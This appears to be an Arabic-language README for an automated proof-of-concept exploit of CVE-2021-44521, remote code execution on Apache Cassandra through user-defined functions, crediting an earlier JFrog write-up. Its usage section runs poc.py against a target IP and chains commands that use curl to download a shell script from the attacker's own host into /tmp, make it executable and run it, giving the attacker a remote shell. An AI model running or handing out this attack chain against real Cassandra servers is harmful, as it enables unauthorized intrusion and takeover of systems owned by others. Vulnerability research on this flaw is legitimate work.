
إثبات مفهوم آلي لاستغلال ثغرة CVE-2021-44521، مما يتيح تنفيذ التعليمات البرمجية عن بُعد على Apache Cassandra عبر الدوال المعرّفة من قبل المستخدم. ينفّذ أوامر عشوائية على عنوان IP المستهدف.
PoC آلي لثغرة CVE-2021-44521 يعود الفضل في الـ PoC الأصلي إلى: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-driver
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
لاحظ أنه لا يمكنك تنفيذ أكثر من أمر في المرة الواحدة، ولا يمكنك استخدام الأنابيب (pipes) حتى الآن. لذا قم بتشغيل
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"